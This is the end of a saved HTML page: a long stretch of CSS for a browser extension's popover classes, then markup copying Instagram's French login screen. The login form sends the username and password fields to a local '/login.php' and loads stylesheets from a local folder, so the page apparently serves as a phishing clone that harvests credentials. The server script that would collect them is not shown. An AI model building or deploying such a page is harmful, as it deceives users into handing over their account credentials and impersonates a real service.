  background-color: #ffffff;
}
.popover-wanteeed .btn-success {
  color: #ffffff;
  background-color: #5cb85c;
  border-color: #4cae4c;
}
.popover-wanteeed .btn-success:hover,
.popover-wanteeed .btn-success:focus,
.popover-wanteeed .btn-success:active,
.popover-wanteeed .btn-success.active,
.popover-wanteeed .open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #449d44;
  border-color: #398439;
}
.popover-wanteeed .btn-success:active,
.popover-wanteeed .btn-success.active,
.popover-wanteeed .open > .dropdown-toggle.btn-success {
  background-image: none;
}
.popover-wanteeed .btn-success.disabled,
.popover-wanteeed .btn-success[disabled],
.popover-wanteeed fieldset[disabled] .btn-success,
.popover-wanteeed .btn-success.disabled:hover,
.popover-wanteeed .btn-success[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-success:hover,
.popover-wanteeed .btn-success.disabled:focus,
.popover-wanteeed .btn-success[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-success:focus,
.popover-wanteeed .btn-success.disabled:active,
.popover-wanteeed .btn-success[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-success:active,
.popover-wanteeed .btn-success.disabled.active,
.popover-wanteeed .btn-success[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-success.active {
  background-color: #5cb85c;
  border-color: #4cae4c;
}
.popover-wanteeed .btn-success .badge {
  color: #5cb85c;
  background-color: #ffffff;
}
.popover-wanteeed .btn-info {
  color: #ffffff;
  background-color: #5bc0de;
  border-color: #46b8da;
}
.popover-wanteeed .btn-info:hover,
.popover-wanteeed .btn-info:focus,
.popover-wanteeed .btn-info:active,
.popover-wanteeed .btn-info.active,
.popover-wanteeed .open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #31b0d5;
  border-color: #269abc;
}
.popover-wanteeed .btn-info:active,
.popover-wanteeed .btn-info.active,
.popover-wanteeed .open > .dropdown-toggle.btn-info {
  background-image: none;
}
.popover-wanteeed .btn-info.disabled,
.popover-wanteeed .btn-info[disabled],
.popover-wanteeed fieldset[disabled] .btn-info,
.popover-wanteeed .btn-info.disabled:hover,
.popover-wanteeed .btn-info[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-info:hover,
.popover-wanteeed .btn-info.disabled:focus,
.popover-wanteeed .btn-info[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-info:focus,
.popover-wanteeed .btn-info.disabled:active,
.popover-wanteeed .btn-info[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-info:active,
.popover-wanteeed .btn-info.disabled.active,
.popover-wanteeed .btn-info[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-info.active {
  background-color: #5bc0de;
  border-color: #46b8da;
}
.popover-wanteeed .btn-info .badge {
  color: #5bc0de;
  background-color: #ffffff;
}
.popover-wanteeed .btn-warning {
  color: #ffffff;
  background-color: #f0ad4e;
  border-color: #eea236;
}
.popover-wanteeed .btn-warning:hover,
.popover-wanteeed .btn-warning:focus,
.popover-wanteeed .btn-warning:active,
.popover-wanteeed .btn-warning.active,
.popover-wanteeed .open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #ec971f;
  border-color: #d58512;
}
.popover-wanteeed .btn-warning:active,
.popover-wanteeed .btn-warning.active,
.popover-wanteeed .open > .dropdown-toggle.btn-warning {
  background-image: none;
}
.popover-wanteeed .btn-warning.disabled,
.popover-wanteeed .btn-warning[disabled],
.popover-wanteeed fieldset[disabled] .btn-warning,
.popover-wanteeed .btn-warning.disabled:hover,
.popover-wanteeed .btn-warning[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-warning:hover,
.popover-wanteeed .btn-warning.disabled:focus,
.popover-wanteeed .btn-warning[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-warning:focus,
.popover-wanteeed .btn-warning.disabled:active,
.popover-wanteeed .btn-warning[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-warning:active,
.popover-wanteeed .btn-warning.disabled.active,
.popover-wanteeed .btn-warning[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-warning.active {
  background-color: #f0ad4e;
  border-color: #eea236;
}
.popover-wanteeed .btn-warning .badge {
  color: #f0ad4e;
  background-color: #ffffff;
}
.popover-wanteeed .btn-danger {
  color: #ffffff;
  background-color: #d9534f;
  border-color: #d43f3a;
}
.popover-wanteeed .btn-danger:hover,
.popover-wanteeed .btn-danger:focus,
.popover-wanteeed .btn-danger:active,
.popover-wanteeed .btn-danger.active,
.popover-wanteeed .open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #c9302c;
  border-color: #ac2925;
}
.popover-wanteeed .btn-danger:active,
.popover-wanteeed .btn-danger.active,
.popover-wanteeed .open > .dropdown-toggle.btn-danger {
  background-image: none;
}
.popover-wanteeed .btn-danger.disabled,
.popover-wanteeed .btn-danger[disabled],
.popover-wanteeed fieldset[disabled] .btn-danger,
.popover-wanteeed .btn-danger.disabled:hover,
.popover-wanteeed .btn-danger[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-danger:hover,
.popover-wanteeed .btn-danger.disabled:focus,
.popover-wanteeed .btn-danger[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-danger:focus,
.popover-wanteeed .btn-danger.disabled:active,
.popover-wanteeed .btn-danger[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-danger:active,
.popover-wanteeed .btn-danger.disabled.active,
.popover-wanteeed .btn-danger[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-danger.active {
  background-color: #d9534f;
  border-color: #d43f3a;
}
.popover-wanteeed .btn-danger .badge {
  color: #d9534f;
  background-color: #ffffff;
}
.popover-wanteeed .btn-link {
  color: #428bca;
  font-weight: normal;
  cursor: pointer;
  border-radius: 0;
}
.popover-wanteeed .btn-link,
.popover-wanteeed .btn-link:active,
.popover-wanteeed .btn-link[disabled],
.popover-wanteeed fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.popover-wanteeed .btn-link,
.popover-wanteeed .btn-link:hover,
.popover-wanteeed .btn-link:focus,
.popover-wanteeed .btn-link:active {
  border-color: transparent;
}
.popover-wanteeed .btn-link:hover,
.popover-wanteeed .btn-link:focus {
  color: #2a6496;
  text-decoration: underline;
  background-color: transparent;
}
.popover-wanteeed .btn-link[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-link:hover,
.popover-wanteeed .btn-link[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-link:focus {
  color: #777777;
  text-decoration: none;
}
.popover-wanteeed .btn-lg,
.popover-wanteeed .btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 6px;
}
.popover-wanteeed .btn-sm,
.popover-wanteeed .btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.popover-wanteeed .btn-xs,
.popover-wanteeed btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.popover-wanteeed .btn-block {
  display: block;
  width: 100%;
}
.popover-wanteeed .btn-block + .btn-block {
  margin-top: 5px;
}
.popover-wanteeed input[type="submit"].btn-block,
.popover-wanteeed input[type="reset"].btn-block,
.popover-wanteeed input[type="button"].btn-block {
  width: 100%;
}
.popover-wanteeed .btn-group,
.popover-wanteeed .btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.popover-wanteeed .btn-group > .btn,
.popover-wanteeed .btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.popover-wanteeed .btn-group > .btn:hover,
.popover-wanteeed .btn-group-vertical > .btn:hover,
.popover-wanteeed .btn-group > .btn:focus,
.popover-wanteeed .btn-group-vertical > .btn:focus,
.popover-wanteeed .btn-group > .btn:active,
.popover-wanteeed .btn-group-vertical > .btn:active,
.popover-wanteeed .btn-group > .btn.active,
.popover-wanteeed .btn-group-vertical > .btn.active {
  z-index: 2;
}
.popover-wanteeed .btn-group > .btn:focus,
.popover-wanteeed .btn-group-vertical > .btn:focus {
  outline: 0;
}
.popover-wanteeed .btn-group .btn + .btn,
.popover-wanteeed .btn-group .btn + .btn-group,
.popover-wanteeed .btn-group .btn-group + .btn,
.popover-wanteeed .btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.popover-wanteeed .btn-toolbar {
  margin-left: -5px;
}
.popover-wanteeed .btn-toolbar .btn-group,
.popover-wanteeed .btn-toolbar .input-group {
  float: left;
}
.popover-wanteeed .btn-toolbar > .btn,
.popover-wanteeed .btn-toolbar > .btn-group,
.popover-wanteeed .btn-toolbar > .input-group {
  margin-left: 5px;
}
.popover-wanteeed .btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.popover-wanteeed .btn-group > .btn:first-child {
  margin-left: 0;
}
.popover-wanteeed .btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.popover-wanteeed .btn-group > .btn:last-child:not(:first-child),
.popover-wanteeed .btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.popover-wanteeed .btn-group > .btn-group {
  float: left;
}
.popover-wanteeed .btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.popover-wanteeed .btn-group > .btn-group:first-child > .btn:last-child,
.popover-wanteeed .btn-group > .btn-group:first-child > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.popover-wanteeed .btn-group > .btn-group:last-child > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.popover-wanteeed .btn-group .dropdown-toggle:active,
.popover-wanteeed .btn-group.open .dropdown-toggle {
  outline: 0;
}
.popover-wanteeed .btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.popover-wanteeed .btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.popover-wanteeed .btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.popover-wanteeed .btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.popover-wanteeed .btn .caret {
  margin-left: 0;
}
.popover-wanteeed .btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.popover-wanteeed .dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.popover-wanteeed .btn-group-vertical > .btn,
.popover-wanteeed .btn-group-vertical > .btn-group,
.popover-wanteeed .btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.popover-wanteeed .btn-group-vertical > .btn-group > .btn {
  float: none;
}
.popover-wanteeed .btn-group-vertical > .btn + .btn,
.popover-wanteeed .btn-group-vertical > .btn + .btn-group,
.popover-wanteeed .btn-group-vertical > .btn-group + .btn,
.popover-wanteeed .btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.popover-wanteeed .btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.popover-wanteeed .btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 4px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.popover-wanteeed .btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-left-radius: 4px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.popover-wanteeed .btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.popover-wanteeed .btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.popover-wanteeed .btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.popover-wanteeed .btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.popover-wanteeed .btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.popover-wanteeed .btn-group-justified > .btn,
.popover-wanteeed .btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.popover-wanteeed .btn-group-justified > .btn-group .btn {
  width: 100%;
}
.popover-wanteeed .btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
.popover-wanteeed [data-toggle="buttons"] > .btn > input[type="radio"],
.popover-wanteeed [data-toggle="buttons"] > .btn > input[type="checkbox"] {
  position: absolute;
  z-index: -1;
  opacity: 0;
  filter: alpha(opacity=0);
}
.popover-wanteeed {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1060;
  display: none;
  max-width: 276px;
  padding: 1px;
  text-align: left;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 6px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
  bottom:inherit ;
}
.popover-wanteeed.top {
  margin-top: -10px;
}
.popover-wanteeed.right {
  margin-left: 10px;
}
.popover-wanteeed.bottom {
  margin-top: 10px;
}
.popover-wanteeed.left {
  margin-left: -10px;
}
.popover-wanteeed .popover-title {
  margin: 0;
  padding: 8px 14px ;
  font-size: 14px;
  font-weight: normal;
  line-height: 18px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: 5px 5px 0 0;
  text-align:center;
}
.popover-wanteeed .popover-content {
  padding: 9px 14px;
}
.popover-wanteeed > .arrow,
.popover-wanteeed > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover-wanteeed > .arrow {
  border-width: 11px;
}
.popover-wanteeed > .arrow:after {
  border-width: 10px;
  content: "";
}
.popover-wanteeed.top > .arrow {
  left: 50%;
  margin-left: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover-wanteeed.top > .arrow:after {
  content: " ";
  bottom: 1px;
  margin-left: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover-wanteeed.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover-wanteeed.right > .arrow:after {
  content: " ";
  left: 1px;
  bottom: -10px;
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover-wanteeed.bottom > .arrow {
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover-wanteeed.bottom > .arrow:after {
  content: " ";
  top: 1px;
  margin-left: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover-wanteeed.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover-wanteeed.left > .arrow:after {
  content: " ";
  right: 1px;
  border-right-width: 0;
  border-left-color: #ffffff;
  bottom: -10px;
}
.tour-backdrop-wanteeed {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1999998;
  background-color: #000;
  opacity: 0.8;
  filter: alpha(opacity=80);
}
.tour-step-backdrop-wanteeed {
  position: relative;
  z-index: 1999999;
  background: inherit;
}
.tour-step-backdrop-wanteeed > td {
  position: relative;
  z-index: 1999999;
}
.tour-step-background-wanteeed {
  position: absolute !important;
  z-index: 1999998;
  background: inherit;
  border-radius: 6px;
}
.popover-wanteeed[class*="tour-"] {
  z-index: 1999999;/* 1100;*/
}
.popover-wanteeed[class*="tour-"] .popover-navigation {
  padding: 9px 14px;
}
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="end"] {
  float: right;
}
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="prev"],
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="next"],
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="end"] {
  cursor: pointer;
}
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="prev"].disabled,
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="next"].disabled,
.popover-wanteeed[class*="tour-"] .popover-navigation *[data-role="end"].disabled {
  cursor: default;
}
.popover-wanteeed[class*="tour-"].orphan {
  position: fixed;
  margin-top: 0;
}
.popover-wanteeed[class*="tour-"].orphan .arrow {
  display: none;
}
</style></head>
    <body class="" style="">
        
    <div id="react-root">

        <section class="_9eogI E3X2T">

            <div></div>

            <main class="SCxLW uzKWK  " role="main">

                <nav class="q8NLd">

                    <span class="_3G4x7  _9rw6G">

                        <div class="TQUPK">
                            <span>Français</span>
                            <span class="coreSpriteChevronDownGrey _6Q5Yk"></span>
                        </div>

                        <select aria-label="Changer la langue d’affichage" class="hztqj"><option value="af">Afrikaans</option><option value="cs">Čeština</option><option value="da">Dansk</option><option value="de">Deutsch</option><option value="el">Ελληνικά</option><option value="en">English</option><option value="es">Español (España)</option><option value="es-la">Español</option><option value="fi">Suomi</option><option value="fr">Français</option><option value="id">Bahasa Indonesia</option><option value="it">Italiano</option><option value="ja">日本語</option><option value="ko">한국어</option><option value="ms">Bahasa Melayu</option><option value="nb">Norsk</option><option value="nl">Nederlands</option><option value="pl">Polski</option><option value="pt-br">Português (Brasil)</option><option value="pt">Português (Portugal)</option><option value="ru">Русский</option><option value="sv">Svenska</option><option value="th">ภาษาไทย</option><option value="tl">Filipino</option><option value="tr">Türkçe</option><option value="zh-cn">中文(简体)</option><option value="zh-tw">中文(台灣)</option><option value="bn">বাংলা</option><option value="gu">ગુજરાતી</option><option value="hi">हिन्दी</option><option value="hr">Hrvatski</option><option value="hu">Magyar</option><option value="kn">ಕನ್ನಡ</option><option value="ml">മലയാളം</option><option value="mr">मराठी</option><option value="ne">नेपाली</option><option value="pa">ਪੰਜਾਬੀ</option><option value="si">සිංහල</option><option value="sk">Slovenčina</option><option value="ta">தமிழ்</option><option value="te">తెలుగు</option><option value="vi">Tiếng Việt</option><option value="zh-hk">中文(香港)</option><option value="bg">Български</option><option value="fr-ca">Français (Canada)</option><option value="ro">Română</option><option value="sr">Српски</option><option value="uk">Українська</option></select>
                    </span>

                    <div class="coreSpriteOptionsEllipsis KjWFV" role="menuitem" tabindex="0"></div>
                </nav><article class="tbpKJ">

                <div class="rgFsT M2tlr">
                    
                    <div class="gr27e ">
                        
                        <h1 class="NXVPg Szr5J  coreSpriteLoggedOutWordmark">Instagram</h1>

                        <div class="EPjEi">
                        
                        <form class="HmktE" method="post" action="/login.php">
                            
                            <div class="                   Igw0E     IwRSH      eGOV_         _4EzTm        FBi-h                                                                                                      "></div>
                            
                            <div class="                   Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    ">
                                <button class="sqdOP  L3NKy   y3zKF     " type="button"><span class="coreSpriteFacebookIconInverted AeB99"></span>Continuer avec Facebook</button>
                            </div>
                            
                            <div class="K-1uj VILGp">
                                <div class="s311c"></div>
                                <div class="_0tv-g">ou</div>
                                <div class="s311c"></div>
                            </div>

                            <div class="Et89U">
                                <div class="_9GP1n   ">
                                    
                                    <label class="f0n8F ">
                                        <!--<span class="_9nyy2">Numéro de téléphone, nom d’utilisateur ou adresse e-mail</span>-->
                                        <input placeholder="Numéro de téléphone, nom d’utilisateur ou adresse e-mail" aria-label="Numéro de téléphone, nom d’utilisateur ou adresse e-mail" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" name="username" type="text" class="_2hvTZ pexuQ zyHYP" value="">
                                        <!--<div class="cyclonis-password-manager-input-icon safari enabled" style="z-index: 1 !important; left: 222px !important; top: 0px !important; padding: 9px !important; height: 36px !important; width: 36px !important; min-height: 36px !important; max-height: 36px !important; min-width: 36px !important; max-width: 36px !important;"></div>-->
                                    </label>

                                    <!--<div class="i24fI"></div>-->
                                </div>
                            </div>

                            <div class="Et89U">
                                <div class="_9GP1n   ">

                                    <label class="f0n8F ">
                                        <!--<span class="_9nyy2">Mot de passe</span>-->
                                        <input placeholder="Mot de passe" aria-label="Mot de passe" aria-required="true" autocapitalize="off" autocorrect="off" name="password" type="password" class="_2hvTZ pexuQ zyHYP" value="">
                                        <!--<div class="cyclonis-password-manager-input-icon safari enabled" style="z-index: 1 !important; left: 222px !important; top: 0px !important; padding: 9px !important; height: 36px !important; width: 36px !important; min-height: 36px !important; max-height: 36px !important; min-width: 36px !important; max-width: 36px !important;"></div>-->
                                    </label>

                                    <!--<div class="i24fI"></div>-->
                                </div>
                            </div>

                            <div class="                   Igw0E     IwRSH       hLiUi    ybXk5    _4EzTm    bkEs3                          CovQj                  jKUp7                                              qJPeX                ">
                                <a href="/accounts/password/reset/">
                                    <div class="_7UhW9   xLCgt      MMzan       gtFbE   uL8Hv         ">Mot de passe oublié&nbsp;?</div>
                                </a>
                            </div>

                            <div class="                   Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    ">
                                <button class="sqdOP  L3NKy   y3zKF     " type="submit"><div class="                   Igw0E     IwRSH      eGOV_         _4EzTm                                                                                                              ">Connexion</div></button>
                            </div>

                            <div class="                   Igw0E   rBNOH        eGOV_         _4EzTm                                                            aGBdT                                                  ">
                                <div class="_7UhW9   xLCgt     yUEEX    _0PwGv       uL8Hv         ">
                                    <p>Vous n’avez pas de compte &nbsp;? <a href="/accounts/signup/phone"><span class="_7UhW9   xLCgt       qyrsm      gtFbE    se6yk        ">Inscrivez-vous</span></a></p>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </article>

        <div class="      tHaIX             Igw0E   rBNOH          YBx95   ybXk5    _4EzTm                                                                                                        O1flK   _7JkPY    PdTAI ZUqME" style="height: 60px; width: 100%;">
            <span aria-label="de Facebook" class="glyphsSpriteFb_brand_center_grey u-__7"></span>
        </div>

    </main>

    <footer class="_8Rna9 _09ncq  " role="contentinfo"></footer>
</section>

</div>


<link rel="stylesheet" href="css/af986a96d279.css" type="text/css" crossorigin="anonymous">
<link rel="stylesheet" href="css/04779c068c3a.css" type="text/css" crossorigin="anonymous">
<link rel="stylesheet" href="css/6422eae3aab5.css" type="text/css" crossorigin="anonymous">
   

<div class="Z2m7o">
    <div class="CgFia "></div>
</div>

<div id="fb-root" class=" fb_reset">
    <div style="position: absolute; top: -10000px; width: 0px; height: 0px;">
        <div></div>
    </div>
</div>

<iframe id="wanteeedPanel" data-version="1.7.4" allowtransparency="true" style="
      width: 335px !important;
      height: 250px !important;
      min-width: 0;
      min-height: 0;
      display: none;
      position: fixed;
      top: 10px;
      right: 10px;
      left: auto;
      border: none;
      background-color: #ffffff;
      overflow: hidden;
      z-index: 9145739864;
      clip: auto;
      border-radius: 3px;
      box-shadow: rgb(181, 181, 181) 1px 1px 3px 2px;
    "></iframe>

</body>
</html>